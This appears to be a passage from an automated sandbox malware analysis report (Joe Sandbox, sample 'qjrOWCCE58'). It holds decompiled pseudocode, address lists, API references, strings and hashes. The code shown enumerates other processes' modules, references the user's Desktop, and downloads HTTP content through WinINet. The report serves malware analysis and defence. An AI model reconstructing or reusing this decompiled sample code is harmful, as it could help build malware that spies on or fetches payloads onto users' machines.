																				E00411D17(_t366, _t415, _t434, __eflags);
																				goto L105;
																			} else {
																				goto L102;
																			}
																		}
																	}
																} else {
																	_t187 = _t311 + 1; // 0x11
																	_t405 = _t187;
																	_t312 = _t457;
																	__eflags = _t405 - 0x1000;
																	if(_t405 < 0x1000) {
																		L100:
																		_push(_t405);
																		E0040D5EF(_t457);
																		_t499 = _t499 + 8;
																		goto L101;
																	} else {
																		_t460 =  *((intOrPtr*)(_t457 - 4));
																		_t415 = _t405 + 0x23;
																		__eflags = _t312 - _t460 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L105;
																		} else {
																			goto L100;
																		}
																	}
																}
															} else {
																_t316 = _v68;
																__eflags = _t316 - 0x419;
																if(_t316 == 0x419) {
																	goto L97;
																} else {
																	__eflags = _t316 - 0x422;
																	if(_t316 == 0x422) {
																		goto L97;
																	} else {
																		__eflags = _t316 - 0x423;
																		if(_t316 == 0x423) {
																			goto L97;
																		} else {
																			__eflags = _t316 - 0x43f;
																			if(_t316 == 0x43f) {
																				goto L97;
																			} else {
																				_v32 = 0;
																				_t317 = _v72;
																				__eflags = _t317 - 0x10;
																				if(_t317 < 0x10) {
																					goto L90;
																				} else {
																					_t171 = _t317 + 1; // 0x11
																					_t405 = _t171;
																					_t318 = _t457;
																					__eflags = _t405 - 0x1000;
																					if(_t405 < 0x1000) {
																						L89:
																						_push(_t405);
																						E0040D5EF(_t457);
																						_t499 = _t499 + 8;
																						goto L90;
																					} else {
																						_t460 =  *((intOrPtr*)(_t457 - 4));
																						_t415 = _t405 + 0x23;
																						__eflags = _t318 - _t460 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L105;
																						} else {
																							goto L89;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t164 = _t310 + 1; // 0x11
															_t405 = _t164;
															_t322 = _t366;
															__eflags = _t405 - 0x1000;
															if(_t405 < 0x1000) {
																L80:
																_push(_t405);
																E0040D5EF(_t366);
																_t457 = _v92;
																_t499 = _t499 + 8;
																goto L81;
															} else {
																_t366 =  *(_t366 - 4);
																_t415 = _t405 + 0x23;
																__eflags = _t322 - _t366 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	L105:
																	E00411D17(_t366, _t415, _t434, __eflags);
																	asm("int3");
																	asm("int3");
																	_push(_t475);
																	_t477 = _t501;
																	_t284 =  *0x43b054; // 0x41d6575c
																	_v1896 = _t284 ^ _t477;
																	_push(_t460);
																	_push(_t447);
																	_t449 = _t415;
																	_v2164 = _t449;
																	_v2164 = _t449;
																	_t286 =  *0x437a6c; // 0x3e
																	asm("movq xmm0, [0x437a64]");
																	_v2148 = _t286;
																	asm("movq [ebp-0x108], xmm0");
																	E0040F2F0(_t449,  &_v2146, 0, 0xfa);
																	_t462 = OpenProcess(0x410, 0, _t434);
																	__eflags = _t462;
																	if(_t462 != 0) {
																		_t297 =  &_v304;
																		__imp__K32EnumProcessModules(_t462, _t297, 4,  &_v300); // executed
																		__eflags = _t297;
																		if(_t297 != 0) {
																			__imp__K32GetModuleBaseNameA(_t462, _v304,  &_v296, 0x104); // executed
																		}
																	}
																	FindCloseChangeNotification(_t462); // executed
																	_t416 =  &_v296;
																	 *_t449 = 0;
																	_t449[4] = 0;
																	_t439 = _t416 + 1;
																	_t449[5] = 0xf;
																	 *_t449 = 0;
																	do {
																		_t291 =  *_t416;
																		_t416 = _t416 + 1;
																		__eflags = _t291;
																	} while (_t291 != 0);
																	_push(_t416 - _t439);
																	E00402030(_t449,  &_v296);
																	_pop(_t450);
																	__eflags = _v36 ^ _t477;
																	_pop(_t463);
																	return E0040D3AF(_t449, _t366, _v36 ^ _t477, _t439, _t450, _t463);
																} else {
																	goto L80;
																}
															}
														}
														goto L112;
														L90:
														_t365 = _v100;
														_t447 = _t447 + 0x1c;
														_t464 = _v108;
														__eflags = _t447 - _v104;
													} while (_t447 != _v104);
													_t447 = _v64;
													goto L92;
												}
											} else {
												goto L61;
											}
										}
									}
									goto L112;
									L62:
									_t445 = _t445 + 1;
									__eflags = _t445 - _v1580;
								} while (_t445 < _v1580);
								goto L63;
							}
						} else {
							goto L13;
						}
					}
				}
				L112:
			}

0x00404120
0x00404120
0x00404121
0x00404129
0x00404130
0x00404134
0x00404136
0x00404138
0x00404143
0x00404144
0x00404145
0x00404148
0x0040414d
0x0040414f
0x00404152
0x00404154
0x00404158
0x00404164
0x0040416b
0x00404172
0x00404179
0x0040417b
0x00404186
0x0040418d
0x00404192
0x00404195
0x0040419c
0x0040419e
0x004041ab
0x004041b3
0x004041b8
0x004041c5
0x004041ca
0x004041ca
0x0040419c
0x004041d4
0x004041d6
0x004041e0
0x004041e0
0x004041e7
0x004041e8
0x004041e0
0x004041ed
0x004041f2
0x004041f9
0x00404200
0x00404207
0x0040420b
0x0040420b
0x00404210
0x00404210
0x00404212
0x00404213
0x00404219
0x00404222
0x00404227
0x00404235
0x0040423a
0x0040423f
0x00404241
0x00404248
0x0040424a
0x00404251
0x00404254
0x0040425b
0x0040425f
0x0040425f
0x00404262
0x00404262
0x00404264
0x00404265
0x0040426b
0x00404270
0x00404275
0x00404279
0x0040427f
0x004042ad
0x004042b2
0x004042b7
0x004042be
0x004042c5
0x004042c9
0x004042cb
0x004042d3
0x004042f6
0x004042fa
0x004042fd
0x00404300
0x00404302
0x004042d5
0x004042db
0x004042de
0x004042e2
0x004042e4
0x004042e7
0x004042e8
0x004042ed
0x004042f0
0x004042f0
0x00404307
0x0040430c
0x00404313
0x0040431a
0x00404324
0x0040432b
0x00404330
0x00404333
0x0040433a
0x0040433c
0x00404349
0x00404351
0x00404356
0x00404363
0x00404368
0x00404368
0x0040433a
0x0040436b
0x00404372
0x00404374
0x0040437b
0x00404382
0x00404389
0x00404390
0x00404397
0x0040439e
0x004043a5
0x004043ae
0x004043ae
0x004043b3
0x004043b6
0x004043bb
0x004043bd
0x004043bd
0x004043c0
0x004043c6
0x004043cd
0x004043d4
0x004043d4
0x004043d6
0x004043d7
0x004043dd
0x004043e5
0x004043ed
0x004043f2
0x004043f5
0x004043fb
0x00404400
0x0040440a
0x00404411
0x00404416
0x00404419
0x00404420
0x00404422
0x00404431
0x00404438
0x0040443d
0x0040444a
0x0040444f
0x0040444f
0x00404420
0x00404452
0x00404459
0x0040445b
0x00404464
0x0040446b
0x0040446f
0x00404474
0x00404474
0x0040447b
0x0040447e
0x00404483
0x00404485
0x00404485
0x00404488
0x0040448e
0x00404495
0x004044a0
0x004044a0
0x004044a2
0x004044a3
0x004044a9
0x004044b1
0x004044b9
0x004044be
0x004044c1
0x004044c9
0x004044ce
0x004044d8
0x004044df
0x004044e4
0x004044e7
0x004044ee
0x004044f0
0x00404500
0x00404507
0x0040450d
0x0040451a
0x0040451f
0x0040451f
0x004044ee
0x00404529
0x0040452b
0x00404532
0x00404537
0x0040453e
0x00404542
0x00404550
0x00404550
0x00404557
0x00404558
0x00404550
0x0040455d
0x00404560
0x00404565
0x00404567
0x00404567
0x0040456a
0x00404570
0x00404577
0x00404580
0x00404580
0x00404582
0x00404583
0x00404589
0x00404591
0x00404599
0x0040459e
0x004045a3
0x004045b8
0x004045b8
0x004045b1
0x004045b1
0x004045b1
0x004045ba
0x004045c0
0x004045ea
0x004045ef
0x004045f7
0x004045f8
0x00404609
0x004045c2
0x004045c2
0x004045c5
0x004045c6
0x004045ce
0x004045e0
0x004045e0
0x004045e2
0x00000000
0x004045d0
0x004045d0
0x004045d3
0x004045de
0x00000000
0x00000000
0x00000000
0x00000000
0x004045de
0x004045ce
0x00404281
0x00404281
0x00404284
0x00404285
0x0040428d
0x004042a3
0x004042a3
0x004042a5
0x004042aa
0x00000000
0x0040428f
0x0040428f
0x00404292
0x0040429d
0x0040460a
0x0040460f
0x0040460f
0x00404614
0x00404615
0x00404616
0x00404617
0x00404618
0x00404619
0x0040461a
0x0040461b
0x0040461c
0x0040461d
0x0040461e
0x0040461f
0x00404620
0x00404621
0x00404629
0x0040462c
0x00404630
0x00404634
0x00404636
0x00404638
0x00404643
0x00404644
0x00404645
0x0040464b
0x00404650
0x00404652
0x00404655
0x00404656
0x00404657
0x0040465b
0x00404661
0x00404663
0x00404669
0x0040466f
0x00404672
0x0040467c
0x00404680
0x00404687
0x0040468d
0x00404694
0x004046a1
0x004046ae
0x004046b8
0x004046be
0x004046c0
0x004046c6
0x004046c8
0x004047da
0x004047df
0x004047e7
0x004047e8
0x004047ec
0x004047f9
0x004046d0
0x004046d0
0x004046d0
0x004046e7
0x004046ed
0x004046f3
0x004046f9
0x00404703
0x0040470d
0x00404710
0x0040471a
0x00404721
0x00404721
0x00404723
0x00404724
0x00404724
0x00404730
0x00404738
0x0040473d
0x00404743
0x00404749
0x00404750
0x00404753
0x00404756
0x0040478a
0x0040478b
0x0040478e
0x00404793
0x00404758
0x00404758
0x0040475f
0x00404764
0x0040476b
0x0040476e
0x00404776
0x0040477b
0x0040477e
0x0040477e
0x00404799
0x0040479d
0x004047a0
0x00000000
0x004047a2
0x004047a2
0x004047a8
0x004047a9
0x004047ab
0x004047b1
0x004047c3
0x004047c3
0x004047c5
0x004047ca
0x00000000
0x004047b3
0x004047b3
0x004047b6
0x004047be
0x004047c1
0x004047fa
0x004047ff
0x00404800
0x00404801
0x00404803
0x00404805
0x00404810
0x00404811
0x00404814
0x00404819
0x0040481b
0x0040481e
0x0040481f
0x00404820
0x00404821
0x00404825
0x0040482b
0x0040482d
0x00404830
0x00404833
0x00404836
0x0040483b
0x0040483e
0x00404843
0x00404846
0x00404849
0x0040484c
0x0040484f
0x00404851
0x00404a65
0x00404a65
0x00404a65
0x00000000
0x00404857
0x0040485d
0x00404864
0x0040486b
0x0040486d
0x00404870
0x00404874
0x0040487c
0x0040487f
0x00404883
0x00404888
0x0040488e
0x00404895
0x0040489a
0x0040489d
0x004048a4
0x004048a6
0x004048a9
0x004048ae
0x004048b6
0x004048bb
0x004048c8
0x004048cd
0x004048cd
0x004048a4
0x004048d0
0x004048d5
0x004048d7
0x004048d9
0x004048e0
0x004048e7
0x004048ee
0x004048f5
0x004048fc
0x00404903
0x0040490a
0x0040490a
0x0040490c
0x0040490c
0x00404911
0x00404916
0x0040491d
0x00404924
0x0040492b
0x0040492b
0x00404930
0x00404930
0x00404932
0x00404933
0x00404933
0x0040493c
0x00404942
0x0040494a
0x00404950
0x00404959
0x0040495d
0x00404960
0x00404963
0x00404966
0x0040496b
0x0040496f
0x00404974
0x00404977
0x0040497a
0x004049a2
0x004049a2
0x0040497c
0x0040497c
0x00404983
0x00404988
0x00404991
0x00404996
0x00404999
0x0040499d
0x004049a0
0x00000000
0x00000000
0x004049a0
0x004049a6
0x004049aa
0x004049ad
0x004049b0
0x004049e0
0x004049e0
0x004049e4
0x00404ac0
0x00404ac0
0x00404ac3
0x00404ac6
0x00404aef
0x00404aef
0x00404af2
0x00404a67
0x00404a67
0x00404a69
0x00404b06
0x00404b0b
0x00404b13
0x00404b14
0x00404b15
0x00404b19
0x00404b23
0x00404a6f
0x00404a72
0x00404a75
0x00404a82
0x00404a85
0x00404a8e
0x00404aa1
0x00404aa3
0x00404aa6
0x00404aac
0x00404afc
0x00404afc
0x00404afe
0x00000000
0x00404aae
0x00404aae
0x00404ab1
0x00404ab9
0x00404abc
0x00404b24
0x00000000
0x00404abe
0x00000000
0x00404abe
0x00404abc
0x00404aac
0x00404ac8
0x00404ac8
0x00404ac8
0x00404acb
0x00404acd
0x00404ad3
0x00404ae5
0x00404ae5
0x00404ae7
0x00404aec
0x00000000
0x00404ad5
0x00404ad5
0x00404ad8
0x00404ae0
0x00404ae3
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ae3
0x00404ad3
0x004049ea
0x004049ea
0x004049ed
0x004049f2
0x00000000
0x004049f8
0x004049f8
0x004049fd
0x00000000
0x00404a03
0x00404a03
0x00404a08
0x00000000
0x00404a0e
0x00404a0e
0x00404a13
0x00000000
0x00404a19
0x00404a19
0x00404a1d
0x00404a20
0x00404a23
0x00000000
0x00404a25
0x00404a25
0x00404a25
0x00404a28
0x00404a2a
0x00404a30
0x00404a46
0x00404a46
0x00404a48
0x00404a4d
0x00000000
0x00404a32
0x00404a32
0x00404a35
0x00404a3d
0x00404a40
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a40
0x00404a30
0x00404a23
0x00404a13
0x00404a08
0x004049fd
0x004049f2
0x004049b2
0x004049b2
0x004049b2
0x004049b5
0x004049b7
0x004049bd
0x004049d3
0x004049d3
0x004049d5
0x004049da
0x004049dd
0x00000000
0x004049bf
0x004049bf
0x004049c2
0x004049ca
0x004049cd
0x00404b29
0x00404b29
0x00404b2e
0x00404b2f
0x00404b30
0x00404b31
0x00404b39
0x00404b40
0x00404b43
0x00404b44
0x00404b45
0x00404b49
0x00404b4f
0x00404b55
0x00404b5b
0x00404b68
0x00404b78
0x00404b80
0x00404b96
0x00404b98
0x00404b9a
0x00404ba5
0x00404bad
0x00404bb3
0x00404bb5
0x00404bca
0x00404bca
0x00404bb5
0x00404bd1
0x00404bd7
0x00404bdd
0x00404be3
0x00404bea
0x00404bed
0x00404bf4
0x00404bf7
0x00404bf7
0x00404bf9
0x00404bfa
0x00404bfa
0x00404c06
0x00404c0a
0x00404c14
0x00404c15
0x00404c17
0x00404c20
0x00000000
0x00000000
0x00000000
0x004049cd
0x004049bd
0x00000000
0x00404a50
0x00404a50
0x00404a53
0x00404a56
0x00404a59
0x00404a59
0x00404a62
0x00000000
0x00404a62
0x00000000
0x00000000
0x00000000
0x004047c1
0x004047b1
0x00000000
0x004047cd
0x004047cd
0x004047ce
0x004047ce
0x00000000
0x004046d0
0x00000000
0x00000000
0x00000000
0x0040429d
0x0040428d
0x00000000

APIs

Part of subcall function 0040D738: EnterCriticalSection.KERNEL32(0043C4FC,?,?,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D743
Part of subcall function 0040D738: LeaveCriticalSection.KERNEL32(0043C4FC,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D780

__Init_thread_footer.LIBCMT ref: 004041C5

Part of subcall function 0040D6EE: EnterCriticalSection.KERNEL32(0043C4FC,?,?,004048CD,0043CE9C), ref: 0040D6F8
Part of subcall function 0040D6EE: LeaveCriticalSection.KERNEL32(0043C4FC,?,004048CD,0043CE9C), ref: 0040D72B
Part of subcall function 0040D6EE: RtlWakeAllConditionVariable.NTDLL ref: 0040D7A2

__Init_thread_footer.LIBCMT ref: 00404363
__Init_thread_footer.LIBCMT ref: 0040444A
__Init_thread_footer.LIBCMT ref: 0040451A

Strings

O@K\, xrefs: 00404313
{}k|, xrefs: 00404164
\Desktop, xrefs: 004042CB
mmBK, xrefs: 0040430C

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalInit_thread_footerSection$EnterLeave$ConditionVariableWake
String ID: O@K\$\Desktop$mmBK${}k|
API String ID: 4264893276-1521651405
Opcode ID: 7e831b6e9157e6a8b9aa2654089bffa9281af610bf4365153ffc025be93768f0
Instruction ID: a85d23473f93e25f6341d0e7bad4cf19c15ebcd15946069f1a0b96d84c941b3c
Opcode Fuzzy Hash: 7e831b6e9157e6a8b9aa2654089bffa9281af610bf4365153ffc025be93768f0
Instruction Fuzzy Hash: 45D175B0D002848BDB04DF78DC893AE7FB1AF86308F14527AE5407B2D2D7785949CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00824387 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 335COMMON

Download Yara Rule

APIs

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

__Init_thread_footer.LIBCMT ref: 0082442C

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

__Init_thread_footer.LIBCMT ref: 008245CA
__Init_thread_footer.LIBCMT ref: 008246B1
__Init_thread_footer.LIBCMT ref: 00824781

Strings

mmBK, xrefs: 00824573
O@K\, xrefs: 0082457A
{}k|, xrefs: 008243CB

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalInit_thread_footerSection$EnterLeave
String ID: O@K\$mmBK${}k|
API String ID: 3080361431-1440596891
Opcode ID: 67c8809e32818b4b9fbfb556031251dbe0dc88fbf77e60f771c1cc705161a03d
Instruction ID: 303ad0b53a705b547fe902061a07451cbc7d78473b06a8ebc8cfd9f05f0002ef
Opcode Fuzzy Hash: 67c8809e32818b4b9fbfb556031251dbe0dc88fbf77e60f771c1cc705161a03d
Instruction Fuzzy Hash: 0FD145719002948ADB04DF78EC8A7ADBFB0FF46304F146278E450BB292D7745989CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401420 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00401420(void* __ebx, void* __ecx, void* __edi, void* _a4) {
				intOrPtr _v4;
				char* _v8;
				char* _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				char _v52;
				void _v56;
				intOrPtr _v60;
				char* _v64;
				char* _v80;
				intOrPtr _v84;
				signed int _v88;
				void* _v92;
				void _v288;
				int _v292;
				long _v296;
				char* _v300;
				char _v316;
				char* _v320;
				char* _v324;
				short* _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v356;
				signed int _v360;
				char* _v364;
				char* _v380;
				intOrPtr* _v488;
				char _v508;
				signed int _v516;
				intOrPtr _v520;
				char* _v524;
				char* _v540;
				intOrPtr _v544;
				char* _v572;
				void* __esi;
				void* __ebp;
				signed int _t210;
				signed int _t211;
				int _t218;
				char* _t219;
				char* _t230;
				intOrPtr _t231;
				short* _t238;
				short _t241;
				intOrPtr* _t244;
				void* _t245;
				char* _t247;
				short* _t251;
				char* _t256;
				char* _t266;
				signed int _t273;
				signed int _t275;
				void* _t281;
				intOrPtr _t294;
				signed int _t299;
				char* _t300;
				void* _t308;
				signed int _t313;
				void* _t319;
				char* _t322;
				intOrPtr _t330;
				int _t332;
				void* _t333;
				void* _t334;
				void* _t336;
				char* _t337;
				signed int _t338;
				void* _t340;
				intOrPtr _t341;
				void* _t343;
				void* _t344;
				intOrPtr* _t353;
				int _t357;
				short* _t364;
				void* _t371;
				char* _t373;
				char* _t376;
				intOrPtr* _t377;
				char _t391;
				char* _t393;
				char* _t400;
				void* _t404;
				short* _t407;
				signed int _t410;
				char* _t414;
				intOrPtr* _t416;
				intOrPtr _t418;
				signed int _t419;
				void* _t420;
				void* _t423;
				void* _t425;
				void* _t426;
				int _t427;
				short* _t428;
				void* _t430;
				intOrPtr _t432;
				signed int _t433;
				signed int _t434;
				void* _t436;
				intOrPtr* _t437;
				intOrPtr _t438;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t443;
				void* _t444;
				intOrPtr _t445;
				void* _t447;
				void* _t448;
				signed int _t451;
				signed int _t452;
				void* _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				signed int _t458;
				void* _t459;
				void* _t461;
				void* _t462;

				_push(0xffffffff);
				_push(0x42aa9b);
				_push( *[fs:0x0]);
				_t455 = _t454 - 0x170;
				_t210 =  *0x43b054; // 0x41d6575c
				_t211 = _t210 ^ _t451;
				_v24 = _t211;
				_push(__ebx);
				_push(__edi);
				_push(_t211);
				 *[fs:0x0] =  &_v16;
				_t440 = __ecx;
				_t466 =  *((intOrPtr*)(__ecx + 0x28));
				_t425 = _a4;
				_v328 = _t425;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					_v332 =  *((intOrPtr*)(__ecx + 0x34));
				} else {
					 *((intOrPtr*)(__ecx + 0x30)) = 0x7800;
					_t330 = E0040D5FD(_t425, __ecx, _t466, 0x7800);
					_t455 = _t455 + 4;
					 *((intOrPtr*)(_t440 + 0x28)) = _t330;
					 *(_t440 + 0x34) = 0;
					_v332 = 0;
				}
				_v296 = 0;
				InternetSetFilePointer(_t425, 0, 0, 0, 0);
				do {
					_t218 = InternetReadFile(_t425,  &(( *(_t440 + 0x34))[ *((intOrPtr*)(_t440 + 0x28))]), 0x3e8,  &_v296);
					_t403 = _v296;
					_t332 = _t218;
					_t219 =  *(_t440 + 0x30);
					 *(_t440 + 0x34) =  &(( *(_t440 + 0x34))[_t403]);
					_t467 = _t219 -  *(_t440 + 0x34) - 0x3e8;
					if(_t219 -  *(_t440 + 0x34) <= 0x3e8) {
						 *(_t440 + 0x30) =  &(_t219[0x7800]);
						_t438 = E0040D5FD(_t425, _t440, _t467,  &(_t219[0x7800]));
						E0040ECB0(_t438,  *((intOrPtr*)(_t440 + 0x28)),  &(( *(_t440 + 0x34))[1]));
						L0040D3BD( *((intOrPtr*)(_t440 + 0x28)));
						_t403 = _v296;
						_t455 = _t455 + 0x14;
						 *((intOrPtr*)(_t440 + 0x28)) = _t438;
						_t425 = _v328;
					}
				} while (_t332 != 0 && _t403 != 0);
				_v296 = 0x103;
				E0040F2F0(_t425,  &_v288, 0, 0x104);
				_t456 = _t455 + 0xc;
				if(HttpQueryInfoA(_t425, 0x1d,  &_v288,  &_v296, 0) == 0) {
					L32:
					( *(_t440 + 0x34))[ *((intOrPtr*)(_t440 + 0x28))] = 0;
					 *[fs:0x0] = _v16;
					_pop(_t426);
					_pop(_t441);
					_pop(_t333);
					return E0040D3AF( *(_t440 + 0x34) - _v332, _t333, _v24 ^ _t451, _t403, _t426, _t441);
				} else {
					_v324 = 0;
					_t230 =  &_v316;
					_v320 = 0;
					__imp__CoCreateInstance(_t230, 0, 1, 0x42c2a0,  &_v324);
					if(_t230 < 0 || _v324 == 0) {
						goto L32;
					} else {
						_t353 =  &_v288;
						_v356 = 0;
						_v340 = 0;
						_t404 = _t353 + 1;
						_v336 = 0xf;
						_v356 = 0;
						asm("o16 nop [eax+eax]");
						do {
							_t231 =  *_t353;
							_t353 = _t353 + 1;
						} while (_t231 != 0);
						_push(_t353 - _t404);
						E00402030( &_v356,  &_v288);
						_v8 = 0;
						_t334 = MultiByteToWideChar;
						_t357 =  &(_v340[1]);
						_t235 =  >=  ? _v356 :  &_v356;
						_v292 = _t357;
						_t427 = MultiByteToWideChar(0, 0,  >=  ? _v356 :  &_v356, _t357, 0, 0);
						_t238 = E0040D5FD(_t427, _t440, _v336 - 0x10,  ~(0 | _v336 - 0x00000010 > 0x00000000) | _t236 * 0x00000002);
						_t457 = _t456 + 4;
						_v328 = _t238;
						_t363 =  >=  ? _v356 :  &_v356;
						_t428 = _t238;
						MultiByteToWideChar(0, 0,  >=  ? _v356 :  &_v356, _v292, _t428, _t427);
						_t364 = _t428;
						_v380 = 0;
						_v364 = 0;
						_v360 = 7;
						_v380 = 0;
						_t66 =  &(_t364[1]); // 0x2
						_t407 = _t66;
						do {
							_t241 =  *_t364;
							_t364 =  &(_t364[1]);
						} while (_t241 != 0);
						E00401ED0( &_v380, _t428, _t364 - _t407 >> 1);
						L0040D3BD(_t428);
						_t458 = _t457 + 4;
						_v8 = 1;
						_t244 = _v324;
						_t409 =  >=  ? _v380 :  &_v380;
						_t245 =  *((intOrPtr*)( *_t244 + 0x10))(_t244,  >=  ? _v380 :  &_v380, L"text",  &_v320);
						_v8 = 0;
						_t430 = _t245;
						_t410 = _v360;
						if(_t410 < 8) {
							L19:
							_v8 = 0xffffffff;
							_t403 = _v336;
							_v364 = 0;
							_v360 = 7;
							_v380 = 0;
							if(_t403 < 0x10) {
								L23:
								if(_t430 >= 0) {
									_t487 = _v320;
									if(_v320 != 0) {
										_t336 = ( *(_t440 + 0x34) - _v332) * 8 -  *(_t440 + 0x34) - _v332;
										_t251 = E0040D5FD(_t430, _t440, _t487, _t336);
										_t459 = _t458 + 4;
										_t371 =  *(_t440 + 0x34) - _v332;
										_v292 = 0;
										_push(0);
										_v300 = 0;
										_t431 =  *_v320;
										_push( &_v292);
										_v328 = _t251;
										_push( &_v300);
										_t403 = _v320;
										_push(_t371);
										_push(_t251);
										_push(_t336);
										_t337 = _v332;
										_push( *((intOrPtr*)(_t440 + 0x28)) + _t337);
										_push(_t371);
										_push(0);
										_push(_v320);
										if( *((intOrPtr*)( *_v320 + 0x10))() >= 0) {
											_t258 = _v292;
											_t414 =  *(_t440 + 0x30);
											_t373 =  &(_t337[_v292]);
											_t489 = _t414 - _t373;
											if(_t414 > _t373) {
												_t432 =  *((intOrPtr*)(_t440 + 0x28));
											} else {
												 *(_t440 + 0x30) =  &(_t373[0x3e8]);
												_t432 = E0040D5FD(_t431, _t440, _t489,  &(_t373[0x3e8]));
												E00401050(_t432,  *(_t440 + 0x30),  *((intOrPtr*)(_t440 + 0x28)), _t337);
												L0040D3BD( *((intOrPtr*)(_t440 + 0x28)));
												_t414 =  *(_t440 + 0x30);
												_t459 = _t459 + 0x10;
												_t258 = _v292;
												 *((intOrPtr*)(_t440 + 0x28)) = _t432;
											}
											_t403 = _t414 - _t337;
											E00401050(_t432 + _t337, _t414 - _t337, _v328, _t258);
											_t459 = _t459 + 8;
											 *(_t440 + 0x34) =  &(_t337[_v292]);
										}
										L0040D3BD(_v328);
										_t256 = _v320;
										 *((intOrPtr*)( *_t256 + 8))(_t256);
									}
								}
								_t247 = _v324;
								 *((intOrPtr*)( *_t247 + 8))(_t247);
								goto L32;
							} else {
								_t376 = _v356;
								_t403 = _t403 + 1;
								_t266 = _t376;
								if(_t403 < 0x1000) {
									L22:
									_push(_t403);
									E0040D5EF(_t376);
									_t458 = _t458 + 8;
									goto L23;
								} else {
									_t376 =  *(_t376 - 4);
									_t403 = _t403 + 0x23;
									if(_t266 - _t376 + 0xfffffffc > 0x1f) {
										goto L33;
									} else {
										goto L22;
									}
								}
							}
						} else {
							_t400 = _v380;
							_t423 = 2 + _t410 * 2;
							_t322 = _t400;
							if(_t423 < 0x1000) {
								L18:
								_push(_t423);
								E0040D5EF(_t400);
								_t458 = _t458 + 8;
								goto L19;
							} else {
								_t376 =  *(_t400 - 4);
								_t403 = _t423 + 0x23;
								if(_t322 - _t376 + 0xfffffffc > 0x1f) {
									L33:
									E00411D17(_t334, _t376, _t403, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t451);
									_t452 = _t458;
									_push(0xffffffff);
									_push(0x42aae5);
									_push( *[fs:0x0]);
									_t461 = _t458 - 0x48;
									_t273 =  *0x43b054 ^ _t452;
									__eflags = _t273;
									_v516 = _t273;
									_push(_t334);
									_push(_t440);
									_push(_t430);
									_push(_t273);
									 *[fs:0x0] =  &_v508;
									_v572 = _t376;
									_t416 = _v488;
									_t377 = _t416;
									_v540 = 0;
									_v544 = _t416;
									_v524 = 0;
									_v520 = 0xf;
									_t442 = _t377 + 1;
									_v540 = 0;
									do {
										_t275 =  *_t377;
										_t377 = _t377 + 1;
										__eflags = _t275;
									} while (_t275 != 0);
									_push(_t377 - _t442);
									E00402030( &_v52, _t416);
									_v12 = 0;
									_t338 = _v32;
									__eflags = _t338 - 0x10;
									_t443 = _v36;
									_t417 = _t443;
									_t381 =  >=  ? _v52 :  &_v52;
									_t433 = E00402180( >=  ? _v52 :  &_v52, _t443,  >=  ? _v52 :  &_v52, "http://", 7);
									_t462 = _t461 + 0xc;
									__eflags = _t433 - 0xffffffff;
									if(_t433 == 0xffffffff) {
										L39:
										__eflags = _v32 - 0x10;
										_t340 =  >=  ? _v52 :  &_v52;
										__eflags = _t443;
										if(_t443 == 0) {
											L42:
											_t434 = _t433 | 0xffffffff;
											__eflags = _t434;
										} else {
											_t433 = E0040F240(_t340, 0x2f, _t443);
											_t462 = _t462 + 0xc;
											__eflags = _t433;
											if(_t433 == 0) {
												goto L42;
											} else {
												_t434 = _t433 - _t340;
											}
										}
										__eflags = _t443 - _t434;
										_v80 = 0;
										_v64 = 0;
										_t383 =  <  ? _t443 : _t434;
										_v60 = 0xf;
										__eflags = _v32 - 0x10;
										_push( <  ? _t443 : _t434);
										_t279 =  >=  ? _v52 :  &_v52;
										_v80 = 0;
										E00402030( &_v80,  >=  ? _v52 :  &_v52);
										_v12 = 1;
										_t281 = _v36;
										__eflags = _t281 - _t434;
										_t435 =  <  ? _t281 : _t434;
										__eflags = _v32 - 0x10;
										_t386 =  >=  ? _v52 :  &_v52;
										_t282 = _t281 - ( <  ? _t281 : _t434);
										_v36 = _t281 - ( <  ? _t281 : _t434);
										E0040ECB0( >=  ? _v52 :  &_v52,  &(( >=  ? _v52 :  &_v52)[ <  ? _t281 : _t434]), _t281 - ( <  ? _t281 : _t434) + 1);
										_t341 = _v84;
										_v88 = 0;
										E00411DF4(_t341 + 0x44, 0x104, _v56, 0x103);
										_t462 = _t462 + 0x1c;
										asm("sbb eax, eax");
										_t443 = InternetOpenA( *(_t341 + 0xc),  ~( *(_t341 + 0x38)) & 0x00000003,  *(_t341 + 0x38), 0, 0);
										_v92 = _t443;
										__eflags = _t443;
										if(_t443 != 0) {
											_v56 = 1;
											InternetSetOptionA(_t443, 0x41,  &_v56, 4);
											__eflags = _v60 - 0x10;
											_t307 =  >=  ? _v80 :  &_v80;
